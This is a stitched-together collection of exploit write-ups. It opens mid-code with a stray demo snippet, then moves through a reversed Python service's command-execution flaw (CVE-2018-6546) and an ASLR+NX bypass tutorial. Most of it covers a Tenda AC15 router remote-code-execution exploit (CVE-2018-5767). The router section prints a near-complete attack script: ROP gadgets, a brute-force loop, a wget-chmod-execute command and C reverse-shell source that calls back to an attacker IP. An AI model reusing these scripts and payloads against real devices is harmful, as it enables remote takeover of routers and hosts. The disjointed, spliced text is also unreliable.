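# C:\example\install\python35.zip

# Self-contained demo: build a tiny archive in memory and list its bytecode.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as demo:
    demo.writestr("plays_service.pyc", b"")
    demo.writestr("README.txt", b"not bytecode")
buffer.seek(0)
print(list_compiled_modules(buffer))  # ['plays_service.pyc']
```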

Reversing – Compiled Python

Looking through the compiled python files, I see three that may be the service’s source code.

I decompiled each of the files using uncompyle6 and opened them up in a text editor. The largest of the three, plays_service.pyc, turned out to be the main service source. The service is a basic HTTP server made up of a few simple classes. It binds to an ephemeral port on startup and writes the port to the registry to be used by the greater application. The POST request handler code is listed below.

The handler expects a JSON formatted POST request with a couple of parameters. The first is the data parameter, which holds the command to be processed. The second is a hash value of the data provided and a secret key. Lucky for us, the secret key just so happens to be hard-coded in the class definition. If the computed hash matches the one provided, the handler calls one of two defined command functions, “extract_files” or “execute_installer”. From here I began to look at the “execute_installer” function because the name sounded quite promising.
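The shape of that check can be sketched as follows. The post does not name the hash function or the JSON keys, so SHA-256, the `data`/`hash` field names and the `HARDCODED_SECRET` value are all assumptions; the point is only that when the key ships inside every installation, anyone who decompiles the bytecode can compute a digest the handler accepts.

```python
import hashlib
import hmac
import json

# Hypothetical stand-in for the key hard-coded in the service class.
HARDCODED_SECRET = "example-secret"

def digest(data: str, secret: str = HARDCODED_SECRET) -> str:
    """Hash of the data plus the secret (SHA-256 is an assumption)."""
    return hashlib.sha256((data + secret).encode("utf-8")).hexdigest()

def build_body(data: str) -> str:
    """JSON body carrying the command and its hash (key names are assumed)."""
    return json.dumps({"data": data, "hash": digest(data)})

def handler_accepts(body: str) -> bool:
    """Server-side check: recompute the hash and compare in constant time."""
    request = json.loads(body)
    return hmac.compare_digest(digest(request["data"]), request["hash"])

print(handler_accepts(build_body("execute_installer")))              # True
print(handler_accepts(json.dumps({"data": "x", "hash": "0" * 64})))  # False
```

Because the same secret sits in every copy of the service, the hash proves nothing about who sent the request; it only proves the sender read the bytecode.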

The function logic is pretty straightforward. It performs a couple of insignificant checks, resolves two paths passed as parameters to the POST request, and then calls CreateProcess. The most important detail of note is that while it looks like a fully controlled command injection is possible, the calls to win32api.GetShortPathName throw an exception if the parameter passed does not resolve to a file. This limits the exploitation of this vulnerability significantly but still allows for privilege escalation to SYSTEM and remote compromise using anonymous outbound SMB.

Exploit

Exploiting this “feature” for file execution didn’t take a significant amount of work. The only real requirements were properly setting up the POST request and hashing the right portion of data. A proof of concept for achieving file execution with this vulnerability (CVE-2018-6546) can be found here.

Bypass ASLR+NX Part 1

Hi guys, today I will explain how to bypass the ASLR and NX mitigation techniques. If you don’t have any knowledge about ASLR and NX, you can read about them in the link above; I will explain them here, but not in depth.

ASLR (Address Space Layout Randomization): a mitigation technique that prevents memory exploitation by making addresses random instead of fixed. As we saw in the basic buffer overflow exploit, we need to put the address of the start of the buffer in EIP to redirect execution to our shellcode; when that address is random, the start of the buffer is hard to guess. The randomization is not only applied to shared library addresses: we also find ASLR in stack and heap addresses.

NX (Non-Executable): another mitigation, used to prevent memory from executing machine code (shellcode). As we saw in the basic buffer overflow, you put shellcode on the stack and redirect EIP to the start of the buffer to execute it, but this will not work here. This mitigation can be bypassed with the ret2libc technique, which calls a function that already exists in the process (for example in libc) and passes its arguments on the stack. There are also other ways that depend on gadgets inside the binary or shared libraries; this technique is ROP (Return Oriented Programming), and I will write a separate article about it.

Now that we have a little info about ASLR and NX, it’s time to see how we can bypass them. There are many ways to bypass ASLR, such as ret2plt, which uses the Procedure Linkage Table (PLT). The PLT contains a stub for each global function: a call instruction in the text segment doesn’t call the function (‘function’) directly; instead, it calls the stub (func@PLT). We return into the PLT because, in a non-PIE binary, it is not randomized: its address is known before execution. Other techniques are overwriting the GOT and brute-forcing; the latter is used when the address is only partially randomized, for example when just 2 or 3 bytes are random.

In this article I will explain a technique that combines ret2plt, some ROP gadgets and ret2libc. Let’s divide it into steps.
First, ret2plt.

Vulnerable code:

We compile it with the following flags:

Now let’s check that ASLR is enabled:

 

As you can see in the image above, libc is randomized, but it could be brute-forced.
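The same check can be scripted. On Linux the setting lives in /proc/sys/kernel/randomize_va_space; the sketch below reads it and maps the value to the meanings documented for that sysctl (paraphrased here). The function and dictionary names are made up for this example.

```python
from pathlib import Path

# Paraphrase of the documented meanings of kernel.randomize_va_space.
ASLR_LEVELS = {
    0: "disabled: no address space randomisation",
    1: "conservative: stack, mmap base (so shared libraries), VDSO and PIE code randomised",
    2: "full: level 1 plus the brk-managed heap",
}

def read_aslr_level(path: str = "/proc/sys/kernel/randomize_va_space"):
    """Return the current setting as an int, or None if the file is absent."""
    setting = Path(path)
    if not setting.exists():
        return None
    return int(setting.read_text().strip())

def describe_aslr(level: int) -> str:
    """Human-readable meaning of a randomize_va_space value."""
    return ASLR_LEVELS.get(level, "unknown setting %d" % level)

level = read_aslr_level()
print("setting not found (not Linux?)" if level is None else describe_aslr(level))
```

None of these levels moves the code of a non-PIE executable, which is why its PLT entries stay at fixed addresses even with ASLR enabled.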

Now let’s open the file in gdb.

Now it’s clear that NX is enabled. Next, let’s fuzz the binary.

We create a pattern and pass it to the binary to detect where the overflow occurs.

 

 

Now we can see part of the pattern in EIP, so we use another tool to find the offset at which the overflow occurred.

It takes 1028 bytes to overwrite EBP; adding 4 more bytes gives us control of EIP, so we can redirect execution.
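The pattern step can be reproduced in a few lines of Python. This is a sketch of the same idea as Metasploit’s pattern_create/pattern_offset (upper-case letter, lower-case letter, digit triplets), not their actual code: because the 4-byte windows of the pattern do not repeat early on, the dword that lands in EIP identifies its own offset. x86 is little-endian, so the EIP value is packed back into bytes before searching.

```python
import string
import struct

def pattern_create(length: int) -> str:
    """Cyclic pattern Aa0Aa1...Zz9, truncated to `length` characters."""
    triplets = (upper + lower + digit
                for upper in string.ascii_uppercase
                for lower in string.ascii_lowercase
                for digit in string.digits)
    pattern = "".join(triplets)
    if length > len(pattern):
        raise ValueError("pattern limited to %d bytes" % len(pattern))
    return pattern[:length]

def pattern_offset(eip_value: int, length: int = 8192) -> int:
    """Offset of the 4 bytes found in EIP, or -1 if they are not in the pattern."""
    needle = struct.pack("<I", eip_value).decode("latin-1")
    return pattern_create(length).find(needle)

print(pattern_create(12))          # Aa0Aa1Aa2Aa3
print(pattern_offset(0x37614136))  # 20 ("6Aa7" read as a little-endian dword)
```

With the real binary, the value gdb shows for EIP after the crash goes into pattern_offset, and the result is the padding length for the exploit.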

 

Now we control EIP.

OK, with the basic overflow steps done, we now need a way to bypass ASLR+NX.

First, find the functions’ PLT entries in the binary.

We find strcpy and system in the PLT. How we build our exploit depends on just these two functions.
Second, we must find a writable section in the binary to fill with our string, and then use system as we did in traditional ret2libc.

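The first thing to look at is the .bss section, which compilers and linkers use for the part of the data segment containing statically allocated variables that are not initialized. It is writable and, in a non-PIE binary, sits at a fixed address, so it is a good place to build our string.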

After that, we will use strcpy to write a string to a .bss address, but copied from what address?
OK, let’s go back to the functions we found in the PLT: strcpy will be used to write the string and system to execute the command. However, we can’t find “/bin/sh” in the binary file, so instead we look through the binary for the individual characters of “sh”.

Now that we have the string addresses, it’s time to combine all the pieces we found.

1. Use strcpy to copy from SRC to DEST. In this case SRC is our string “sh” and DEST is our writable area in .bss. To chain the two functions, strcpy and system, we look for a gadget that matches the number of parameters; strcpy takes two, so we just need pop; pop; ret.

We chose 0x080484ba. The register names don’t matter; we just need two pops.
2. After we write the string, we call system as in ret2libc, but in this case its argument (“/bin/sh” in classic ret2libc) will be the .bss address holding “sh”.

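Final payload (s and h are the addresses of the “s” and “h” characters found in the binary; dummy is a placeholder return address for system):

strcpy+ppr+.bss+s
strcpy+ppr+.bss+1+h
system+dummy+.bss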
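The three lines of the final payload can be assembled with struct.pack as in the sketch below. The ppr gadget 0x080484ba is the one chosen in the text; the PLT, .bss and character addresses are hypothetical placeholders that have to be read from your own build, and the 1028-byte padding is an assumption based on the offset found above. addr_h should point at an “h” that is immediately followed by a NUL byte, because strcpy copies up to the terminator and the second copy has to leave exactly “sh” in .bss.

```python
import struct

def p32(value: int) -> bytes:
    """Pack one 32-bit x86 address, little-endian."""
    return struct.pack("<I", value)

def build_ret2plt_payload(padding: int, strcpy_plt: int, system_plt: int, ppr: int,
                          bss: int, addr_s: int, addr_h: int,
                          dummy_ret: int = 0x41414141) -> bytes:
    """Padding up to the saved return address, then the chain from the text."""
    chain = [
        strcpy_plt, ppr, bss, addr_s,      # strcpy(.bss, "s..."); ppr pops both args
        strcpy_plt, ppr, bss + 1, addr_h,  # strcpy(.bss + 1, "h"); .bss now reads "sh"
        system_plt, dummy_ret, bss,        # system(.bss), i.e. system("sh")
    ]
    return b"A" * padding + b"".join(p32(word) for word in chain)

# Only ppr comes from the text; every other value is a hypothetical placeholder.
payload = build_ret2plt_payload(
    padding=1028,          # assumption: bytes before the saved return address
    strcpy_plt=0x08048310,
    system_plt=0x08048320,
    ppr=0x080484BA,
    bss=0x0804A020,
    addr_s=0x08048154,     # an "s" byte somewhere in the binary
    addr_h=0x0804815A,     # an "h" byte followed directly by a NUL
)
print(len(payload))  # 1072
```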

Final Exploit

 

We got a shell. Sometimes you need to chain many techniques to get a final exploit that bypasses more than one mitigation.

REMOTE CODE EXECUTION ROP,NX,ASLR (CVE-2018-5767) Tenda’s AC15 router

INTRODUCTION (CVE-2018-5767)

In this post we will be presenting a pre-authenticated remote code execution vulnerability present in Tenda’s AC15 router. We start by analysing the vulnerability, before moving on to our regular pattern of exploit development – identifying problems and then fixing those in turn to develop a working exploit.

N.B – Numerous attempts were made to contact the vendor with no success. Due to the nature of the vulnerability, offsets have been redacted from the post to prevent point and click exploitation.

LAYING THE GROUNDWORK

The vulnerability in question is caused by a buffer overflow due to unsanitised user input being passed directly to a call to sscanf. The figure below shows the vulnerable code in the R7WebsSecurityHandler function of the HTTPD binary for the device.

Note that the “password=” parameter is part of the Cookie header. We see that the code uses strstr to find this field, and then copies everything after the equals sign, up to but excluding a ‘;’ character (important for later), into a fixed size stack buffer.

If we send a large enough password value, we can crash the server. In the following picture we have attached to the process using a cross-compiled gdbserver binary; we can access the device using telnet (a story for another post).

This crash isn’t exactly ideal. We can see that it’s due to an invalid read attempting to load a byte from R3 which points to 0x41414141. From our analysis this was identified as occurring in a shared library and instead of looking for ways to exploit it, we turned our focus back on the vulnerable function to try and determine what was happening after the overflow.

In the next figure we see the issue: if the request contains “.gif”, the function returns immediately without further processing. The code isn’t looking for “.gif” in the password, but in the user controlled buffer holding the whole request. Avoiding further processing of an overflowed buffer and returning immediately is exactly what we want (loc_2f7ac simply jumps to the function epilogue).
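The two behaviours described so far, the unbounded copy that stops at ‘;’ and the early return on “.gif”, can be captured in a small model. This is not the router’s code: the function name, the way the request is passed in and the 128-byte BUFFER_SIZE are assumptions made for illustration, since the post does not give the real buffer size.

```python
BUFFER_SIZE = 128  # hypothetical; the post does not state the real size

def model_security_handler(request: bytes, cookie: bytes) -> dict:
    """Toy model of the password copy and the ".gif" early return."""
    marker = b"password="
    start = cookie.find(marker)  # plays the role of strstr()
    copied = b""
    if start != -1:
        # Everything after '=' up to the first ';' is copied, with no length check.
        copied = cookie[start + len(marker):].split(b";", 1)[0]
    return {
        "copied": copied,
        # Bytes written past the end of the buffer, counting the NUL terminator.
        "overflow": max(0, len(copied) + 1 - BUFFER_SIZE),
        # ".gif" anywhere in the request sends the function straight to its epilogue.
        "returns_early": b".gif" in request,
    }

cookie = b"password=" + b"A" * 200 + b";.gif"
request = b"GET / HTTP/1.1\r\nCookie: " + cookie + b"\r\n\r\n"
result = model_security_handler(request, cookie)
print(len(result["copied"]), result["overflow"], result["returns_early"])  # 200 73 True
```

The early return is what makes the overflow useful: the epilogue pops the overwritten saved registers and PC straight away, before any later code can trip over the corrupted stack.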

Appending “.gif” to the end of a long password string of “A”‘s gives us a segfault with PC=0x41414141. With the ability to reliably control the flow of execution we can now outline the problems we must address, and therefore begin to solve them – and so at the same time, develop a working exploit.

To begin with, the following information is available about the binary:

file httpd
format elf
type EXEC (Executable file)
arch arm
bintype elf
bits 32
canary false
endian little
intrp /lib/ld-uClibc.so.0
machine ARM
nx true
pic false
relocs false
relro no
static false

I’ve only included the most important details – mainly, the binary is a 32bit ARMEL executable, dynamically linked with NX being the only exploit mitigation enabled (note that the system has randomize_va_space = 1, which we’ll have to deal with). Therefore, we have the following problems to address:

  1. Gain reliable control of PC through offset of controllable buffer.
  2. Bypass No Execute (NX, the stack is not executable).
  3. Bypass Address space layout randomisation (randomize_va_space = 1).
  4. Chain it all together into a full exploit.

PROBLEM SOLVING 101

The first problem to solve is a general one when it comes to exploiting memory corruption vulnerabilities such as this –  identifying the offset within the buffer at which we can control certain registers. We solve this problem using Metasploit’s pattern create and pattern offset scripts. We identify the correct offset and show reliable control of the PC register:

With problem 1 solved, our next task involves bypassing No Execute. No Execute (NX or DEP) simply prevents us from executing shellcode on the stack. It ensures that there are no writeable and executable pages of memory. NX has been around for a while, so we won’t go into great detail about how it works or its bypasses; all we need is some ROP magic.

We make use of the “Return to Zero Protection” (ret2zp) method [1]. The problem with building a ROP chain for the ARM architecture is down to the fact that function arguments are passed through the R0-R3 registers, as opposed to the stack for Intel x86. To bypass NX on an x86 processor we would simply carry out a ret2libc attack, whereby we store the address of libc’s system function at the correct offset, a fake return address at offset+4, and at offset+8 a pointer to the null terminated string for the command we wish to run:

To perform a similar attack on our current target, we need to pass the address of our command through R0, and then need some way of jumping to the system function. The sort of gadget we need for this is a mov instruction whereby the stack pointer is moved into R0. This gives us the following layout:

We identify such a gadget in the libc shared library; however, the gadget performs the following instructions:

mov r0, sp
blx r3

This means that before jumping to this gadget, we must have the address of system in R3. To solve this problem, we simply locate a gadget that allows us to mov or pop values from the stack into R3, and we identify such a gadget again in the libc library:

pop {r3,r4,r7,pc}

This gadget has the added benefit of loading PC from SP+12 (the fourth word it pops), so it chains straight into the next gadget. Our buffer should therefore look as follows:

Note the ‘;.gif’ string at the end of the buffer: recall that the call to sscanf stops at a ‘;’ character, whilst the ‘.gif’ string will allow us to cleanly exit the function. With the following Python code, we have essentially bypassed NX with two gadgets:

import struct

# Values shown as **** were redacted by the authors; offset and command
# are defined elsewhere in the exploit.
libc_base = ****
# One guess for the randomised libc byte
curr_libc = libc_base + (0x7c << 12)
system = struct.pack("<I", curr_libc + ****)
#: pop {r3, r4, r7, pc}
pop = struct.pack("<I", curr_libc + ****)
#: mov r0, sp ; blx r3
mv_r0_sp = struct.pack("<I", curr_libc + ****)
password = "A"*offset
password += pop + system + "B"*8 + mv_r0_sp + command + ".gif"
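To make the stack arithmetic concrete, here is a toy model (not an emulator) of what the two gadgets do with the bytes that follow the overwritten saved PC. The addresses are hypothetical placeholders rather than the redacted values, the function name is made up, and the command ends with an explicit NUL standing in for the terminator sscanf writes where it stopped at ‘;’.

```python
import struct

def run_gadgets(after_pc: bytes, stack_addr: int, mov_gadget: int):
    """Toy model of `pop {r3, r4, r7, pc}` followed by `mov r0, sp ; blx r3`.

    after_pc   -- buffer bytes that follow the overwritten saved PC
    stack_addr -- hypothetical value of SP when the pop gadget starts
    Returns (branch_target, r0, string_at_r0) for the final `blx r3`.
    """
    sp = 0
    # pop {r3, r4, r7, pc}: four little-endian words, lowest address first.
    r3, r4, r7, pc = struct.unpack_from("<4I", after_pc, sp)
    sp += 16
    if pc != mov_gadget:
        raise ValueError("the pop gadget would not return into the mov gadget")
    # mov r0, sp: R0 now points at the bytes right after the popped words.
    r0 = stack_addr + sp
    # blx r3 calls system(r0); system reads a NUL-terminated C string.
    command = after_pc[sp:].split(b"\0", 1)[0]
    return r3, r0, command

# Hypothetical addresses, not the redacted values from the post.
SYSTEM, MOV_R0_SP = 0x40001000, 0x40002000
after_pc = (struct.pack("<I", SYSTEM) + b"B" * 8 +
            struct.pack("<I", MOV_R0_SP) + b"echo test\0")
target, r0, arg = run_gadgets(after_pc, 0xBEEF0000, MOV_R0_SP)
print(hex(target), hex(r0), arg)  # 0x40001000 0xbeef0010 b'echo test'
```

The model shows why the buffer needs exactly 8 filler bytes: r4 and r7 absorb them, so PC is loaded from SP+12 and R0 ends up pointing at the command.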

With problem 2 solved, we now move on to our third problem: bypassing ASLR. Address space layout randomisation can be very difficult to bypass when we are attacking network based applications, generally because we need some form of information leak. Although ASLR does not apply to the binary itself (which is not position independent), the shared libraries all load at different addresses on each execution. One method to generate an information leak would be to use “native” gadgets present in the HTTPD binary (which does not have ASLR) and ROP into the leak. The problem here, however, is that each gadget address contains a null byte, and so we can only use one. If we look at how random the randomisation really is, we see that the library addresses (specifically libc, which contains our gadgets) actually only differ by one byte on each execution. For example, on one run libc’s base may be located at 0xXXXXXXXX, and on the next run it is at 0xXXXXXXXX. We could theoretically guess this value, and we would have a small chance of guessing correctly.
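How small is that chance? Assuming the randomised byte takes each of its 256 values with equal probability, is drawn afresh whenever HTTPD restarts, and the exploit always uses the same guess (as the fixed 0x7c in the code above does), each attempt independently succeeds with probability 1/256, so about 256 attempts are needed on average. The sketch below computes the odds for a given number of attempts; the function names are made up for this example.

```python
import math

def success_probability(attempts: int, candidates: int = 256) -> float:
    """Chance that at least one of `attempts` independent 1-in-`candidates` guesses hits."""
    return 1.0 - (1.0 - 1.0 / candidates) ** attempts

def attempts_for(target: float, candidates: int = 256) -> int:
    """Fewest attempts whose success probability reaches `target` (0 < target < 1)."""
    return math.ceil(math.log(1.0 - target) / math.log(1.0 - 1.0 / candidates))

print(attempts_for(0.5))                   # 178
print(round(success_probability(256), 3))  # 0.633
```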

This is where our faithful watchdog process comes in. One process running on this device is responsible for restarting services that have crashed, so every time the HTTPD process segfaults, it is immediately restarted, which is pretty handy for us. This is enough for us to do some naïve brute forcing, using the following process:

With NX and ASLR successfully bypassed, we now need to put this all together (problem 4). This, however, provides us with another set of problems to solve:

  1. How do we detect the exploit has been successful?
  2. How do we use this exploit to run arbitrary code on the device?

We start by solving problem 2, which in turn will help us solve problem 1. There are a few steps involved with running arbitrary code on the device. Firstly, we can make use of tools on the device to download arbitrary scripts or binaries, for example, the following command string will download a file from a remote server over HTTP, change its permissions to executable and then run it:

command = "wget http://192.168.0.104/malware -O /tmp/malware && chmod 777 /tmp/malware && /tmp/malware &;"

The “malware” binary should give some indication that the device has been exploited remotely. To achieve this, we write a simple TCP connect-back program. This program will create a connection back to our attacking system and duplicate the stdin, stdout and stderr file descriptors onto the socket; it’s just a simple reverse shell.

#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr */
#include <string.h>
#include <stdio.h>
#include <stdlib.h>      /* system */
#include <unistd.h>      /* dup2 */

int main(int argc, char **argv)
{
    struct sockaddr_in addr;
    int sock = socket(AF_INET, SOCK_STREAM, 0);

    memset(&addr, 0x00, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(31337);
    addr.sin_addr.s_addr = inet_addr("192.168.0.104");

    /* Connect back to the attacking system. */
    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0)
        return 1;

    /* Redirect stdin, stdout and stderr to the socket. */
    dup2(sock, 0);
    dup2(sock, 1);
    dup2(sock, 2);

    system("/bin/sh");
    return 0;
}

We need to cross compile this code into an ARM binary; to do this, we use a prebuilt toolchain downloaded from uClibc. We also want to automate the entire process of this exploit. As such, we use the following code to handle compiling the malicious code (with a dynamically configurable IP address). We then use a subprocess to compile the code (with the user defined port and IP), and serve it over HTTP using Python’s SimpleHTTPServer module.

import subprocess

def compile_shell(comp_path, my_ip):
    '''
    * Take the ARM_REV_SHELL code and modify it with
    * the given ip and port to connect back to.
    * This function then compiles the code into an
    * ARM binary.
    @Param comp_path - This should be the path of the cross-compiler.
    @Param my_ip - The IP address of the system running this code.
    '''
    # ARM_REV_SHELL (the C source template) and REV_PORT are defined
    # elsewhere in the script. Formatting into a local keeps the global
    # template intact, so the function can be called more than once.
    source = ARM_REV_SHELL % (REV_PORT, my_ip)

    # Write the code with IP and port to a.c
    with open("a.c", "w") as outfile:
        outfile.write(source)

    compile_cmd = [comp_path, "a.c", "-o", "a"]
    s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

    # Wait for the process to terminate so we can get its return code.
    # communicate() also drains both pipes, so a verbose compiler cannot
    # fill them and block forever, as busy-polling with poll() could.
    s.communicate()

    if s.returncode == 0:
        return True
    else:
        print("[x] Error compiling code, check compiler? Read the README?")
        return False

 

”’

* This function uses the SimpleHTTPServer module to create

* a http server that will serve our malicious binary.

* This function is called as a thread, as a daemon process.

”’

def start_http_server():

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer((“”, HTTPD_PORT), Handler)

 

print “[+] Http server started on port %d” %HTTPD_PORT

httpd.serve_forever()

This code lets us use the wget tool on the device to fetch our binary and run it. That in turn solves problem 1: we can tell whether the exploit has been successful by waiting for the binary to connect back. The abstract diagram in the next figure shows how a few threads sharing a global flag solve problem 1, given the solution to problem 2.

The functions shown in the following code take care of these processes:

'''
* This function creates a listening socket on port
* REV_PORT. When a connection is accepted it updates
* the global DONE flag to indicate successful exploitation.
* It then jumps into a loop whereby the user can send remote
* commands to the device, interacting with a spawned /bin/sh
* process.
'''
def threaded_listener():
    global DONE
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)

    host = ("0.0.0.0", REV_PORT)

    try:
        s.bind(host)
    except socket.error:
        print "[x] Error binding to %d" % REV_PORT
        return -1

    print "[+] Connect back listener running on port %d" % REV_PORT

    s.listen(1)
    conn, host = s.accept()

    # We got a connection, let's make the exploit thread aware
    DONE = True

    print "[+] Got connect back from %s" % host[0]
    print "[+] Entering command loop, enter exit to quit"

    # Loop continuously, simple reverse shell interface.
    while True:
        print "#",
        cmd = raw_input()
        if cmd == "exit":
            break
        if cmd == "":
            continue

        conn.send(cmd + "\n")

        print conn.recv(4096)

'''
* This function presents the actual vulnerability exploited.
* The Cookie header has a password field that is vulnerable to
* a sscanf buffer overflow. We make use of 2 ROP gadgets to
* bypass DEP/NX, and can brute force ASLR because a watchdog
* process restarts any process that crashes.
* This function will continually make malicious requests to the
* device's web interface until the DONE flag is set to True.
@Param host - the ip address of the target.
@Param port - the port the webserver is running on.
@Param my_ip - The ip address of the attacking system.
'''
def exploit(host, port, my_ip):
    global DONE
    url = "http://%s:%s/goform/exeCommand" % (host, port)
    i = 0

    command = "wget http://%s:%s/a -O /tmp/a && chmod 777 /tmp/a && /tmp/./a &;" % (my_ip, HTTPD_PORT)

    # Guess the same libc base address each time
    # (the base address and gadget offsets, shown as ****, are withheld)
    libc_base = ****
    curr_libc = libc_base + (0x7c << 12)

    system = struct.pack("<I", curr_libc + ****)

    #: pop {r3, r4, r7, pc}
    pop = struct.pack("<I", curr_libc + ****)
    #: mov r0, sp ; blx r3
    mv_r0_sp = struct.pack("<I", curr_libc + ****)

    # offset (the padding up to the saved return address) is also not given.
    # The chain: pop loads r3 = system, r4/r7 = "BBBB", pc = mv_r0_sp;
    # mv_r0_sp then sets r0 = sp (which points at command) and calls system(command).
    password = "A" * offset
    password += pop + system + "B" * 8 + mv_r0_sp + command + ".gif"

    print "[+] Beginning brute force."
    while not DONE:
        i += 1
        print "[+] Attempt %d" % i

        # Build the request, with the malicious password field
        req = urllib2.Request(url)
        req.add_header("Cookie", "password=%s" % password)

        # The request will throw an exception when we crash the server;
        # we don't care about this, so ignore it.
        try:
            resp = urllib2.urlopen(req)
        except Exception:
            pass

        # Give the device some time to restart the process.
        time.sleep(1)

    print "[+] Exploit done"
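The interplay between threaded_listener() and exploit() follows a general pattern: keep retrying until another thread reports success. The sketch below reproduces that pattern on the local machine only, with no target involved. It swaps the global DONE boolean for a threading.Event, which is our substitution and not the author’s code. The hypothetical success_on parameter simulates the attempt on which the “payload” finally connects back.

```python
import socket
import threading


def retry_until_callback(success_on=3, max_attempts=20, wait=0.2):
    """Retry until a listener thread sees a connect-back; return (attempts, done)."""
    done = threading.Event()                  # plays the role of the global DONE flag

    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(("127.0.0.1", 0))             # port 0: let the OS choose a free port
    server.listen(1)
    server.settimeout(5.0)                    # don't block forever if nothing connects
    port = server.getsockname()[1]

    def listener():
        try:
            conn, _ = server.accept()         # blocks until something connects back
        except (socket.timeout, socket.error):
            return                            # no connect-back arrived
        done.set()                            # tell the retry loop to stop
        conn.close()

    thread = threading.Thread(target=listener)
    thread.daemon = True
    thread.start()

    attempts = 0
    while not done.is_set() and attempts < max_attempts:
        attempts += 1
        if attempts == success_on:
            # Simulated successful attempt: the "payload" connects back.
            socket.create_connection(("127.0.0.1", port)).close()
        done.wait(wait)                       # like time.sleep(1), but wakes early on success

    thread.join(timeout=1.0)
    server.close()
    return attempts, done.is_set()
```

Event.wait() doubles as the sleep between attempts. This means the loop stops as soon as the listener reports a connection, rather than after the full delay.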

Finally, we put all of this together by spawning the individual threads, as well as getting command line options as usual:

def main():
    parser = OptionParser()
    parser.add_option("-t", "--target", dest="host_ip",
                      help="IP address of the target")
    parser.add_option("-p", "--port", dest="host_port",
                      help="Port of the target's webserver")
    parser.add_option("-c", "--comp-path", dest="compiler_path",
                      help="path to arm cross compiler")
    parser.add_option("-m", "--my-ip", dest="my_ip", help="your ip address")

    options, args = parser.parse_args()

    host_ip = options.host_ip
    host_port = options.host_port
    comp_path = options.compiler_path
    my_ip = options.my_ip

    if host_ip is None or host_port is None:
        parser.error("[x] A target ip address (-t) and port (-p) are required")

    if comp_path is None:
        parser.error("[x] No compiler path specified, "
                     "you need a uclibc arm cross compiler, "
                     "such as https://www.uclibc.org/downloads/"
                     "binaries/0.9.30/cross-compiler-arm4l.tar.bz2")

    if my_ip is None:
        parser.error("[x] Please pass your ip address (-m)")

    if not compile_shell(comp_path, my_ip):
        print "[x] Exiting due to error in compiling shell"
        return -1

    httpd_thread = threading.Thread(target=start_http_server)
    httpd_thread.daemon = True
    httpd_thread.start()

    conn_listener = threading.Thread(target=threaded_listener)
    conn_listener.start()

    # Give the thread a little time to start up, and fail if it exited early
    time.sleep(3)

    if not conn_listener.is_alive():
        print "[x] Exiting due to conn_listener error"
        return -1

    exploit(host_ip, host_port, my_ip)

    conn_listener.join()

    return 0


if __name__ == '__main__':
    main()

With all of this together, we run the code and after a few minutes get our reverse shell as root:

The full code is here:

#!/usr/bin/env python
import urllib2
import struct
import time
import socket
from optparse import OptionParser
import SimpleHTTPServer
import SocketServer
import threading
import sys
import os
import subprocess

ARM_REV_SHELL = (
    "#include <sys/socket.h>\n"
    "#include <sys/types.h>\n"
    "#include <netinet/in.h>\n"
    "#include <arpa/inet.h>\n"
    "#include <string.h>\n"
    "#include <stdio.h>\n"
    "#include <stdlib.h>\n"
    "#include <unistd.h>\n"
    "int main(int argc, char **argv)\n"
    "{\n"
    "    struct sockaddr_in addr;\n"
    "    int sock = socket(AF_INET, SOCK_STREAM, 0);\n"
    "\n"
    "    memset(&addr, 0x00, sizeof(addr));\n"
    "\n"
    "    addr.sin_family = AF_INET;\n"
    "    addr.sin_port = htons(%d);\n"
    "    addr.sin_addr.s_addr = inet_addr(\"%s\");\n"
    "\n"
    "    connect(sock, (struct sockaddr *)&addr, sizeof(addr));\n"
    "\n"
    "    dup2(sock, 0);\n"
    "    dup2(sock, 1);\n"
    "    dup2(sock, 2);\n"
    "\n"
    "    system(\"/bin/sh\");\n"
    "    return 0;\n"
    "}\n"
)

REV_PORT = 31337
HTTPD_PORT = 8888
DONE = False

'''
* This function creates a listening socket on port
* REV_PORT. When a connection is accepted it updates
* the global DONE flag to indicate successful exploitation.
* It then jumps into a loop whereby the user can send remote
* commands to the device, interacting with a spawned /bin/sh
* process.
'''
def threaded_listener():
    global DONE
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)

    host = ("0.0.0.0", REV_PORT)

    try:
        s.bind(host)
    except socket.error:
        print "[x] Error binding to %d" % REV_PORT
        return -1

    print "[+] Connect back listener running on port %d" % REV_PORT

    s.listen(1)
    conn, host = s.accept()

    # We got a connection, let's make the exploit thread aware
    DONE = True

    print "[+] Got connect back from %s" % host[0]
    print "[+] Entering command loop, enter exit to quit"

    # Loop continuously, simple reverse shell interface.
    while True:
        print "#",
        cmd = raw_input()
        if cmd == "exit":
            break
        if cmd == "":
            continue

        conn.send(cmd + "\n")

        print conn.recv(4096)

'''
* Take the ARM_REV_SHELL code and modify it with
* the given ip and port to connect back to.
* This function then compiles the code into an
* ARM binary.
@Param comp_path - This should be the path of the cross-compiler.
@Param my_ip - The IP address of the system running this code.
'''
def compile_shell(comp_path, my_ip):
    global ARM_REV_SHELL

    # Fill in the port and IP address to connect back to
    ARM_REV_SHELL = ARM_REV_SHELL % (REV_PORT, my_ip)

    # Write the code with ip and port to a.c
    with open("a.c", "w") as outfile:
        outfile.write(ARM_REV_SHELL)

    compile_cmd = [comp_path, "a.c", "-o", "a"]
    s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

    # Wait for the compiler to terminate (draining its output pipes)
    # so we can get its return code
    s.communicate()

    if s.returncode == 0:
        return True
    else:
        print "[x] Error compiling code, check compiler? Read the README?"
        return False

'''
* This function uses the SimpleHTTPServer module to create
* a http server that will serve our malicious binary.
* This function is run in a daemon thread.
'''
def start_http_server():
    Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
    httpd = SocketServer.TCPServer(("", HTTPD_PORT), Handler)

    print "[+] Http server started on port %d" % HTTPD_PORT
    httpd.serve_forever()

'''
* This function presents the actual vulnerability exploited.
* The Cookie header has a password field that is vulnerable to
* a sscanf buffer overflow. We make use of 2 ROP gadgets to
* bypass DEP/NX, and can brute force ASLR because a watchdog
* process restarts any process that crashes.
* This function will continually make malicious requests to the
* device's web interface until the DONE flag is set to True.
